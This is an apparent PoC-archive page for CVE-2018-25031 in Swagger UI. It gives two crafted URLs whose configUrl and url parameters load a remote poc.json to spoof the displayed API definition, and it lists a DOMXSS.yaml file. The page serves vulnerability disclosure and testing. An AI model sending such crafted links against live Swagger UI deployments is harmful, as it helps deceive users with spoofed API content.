POC详情: bda70fa6f655747f3bd3fb9e65c692b6584a60a6

来源
关联漏洞
标题: Swagger UI 输入验证错误漏洞 (CVE-2018-25031)
描述:Swagger UI是一款支持可视化API资源并能够与之进行交互的开源工具。 Swagger-api Swagger UI 4.1.3之前版本中存在安全漏洞,该漏洞源于软件缺少对于用户提交的URL数据过滤和转义。攻击者可以通过特制的URL数据利用该漏洞进行欺骗攻击并显示远程OpenAPI定义。
描述
.json and .yaml files used to exploit CVE-2018-25031
介绍


### CVE-2018-25031  
<div align="center">
<img src="https://afine.com/wp-content/themes/afine/assets/img/logo_light.svg" align="center" style="width: 40%" />
</div>  



### Description:  
#### Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

  
<br/>   
 
### Screenshot before attack:
<img src="https://github.com/afine-com/CVE-2018-25031/blob/main/1.png" align="center" style="width: 100%" />

### PoC:
```
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
```

### PoC Screenshot after attack:
<img src="https://github.com/afine-com/CVE-2018-25031/blob/main/2.png" align="center" style="width: 100%" />

### References:

<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-25031">https://nvd.nist.gov/vuln/detail/CVE-2018-25031</a><br>
<a href="https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2">https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2</a>

##### Tested on Swagger UI 3.52.1
文件快照

[4.0K] /data/pocs/bda70fa6f655747f3bd3fb9e65c692b6584a60a6 ├── [238K] 1.png ├── [108K] 2.png ├── [1.4K] DOMXSS.yaml ├── [ 254] poc.json ├── [ 172] poc.yaml └── [1.2K] README.md 0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。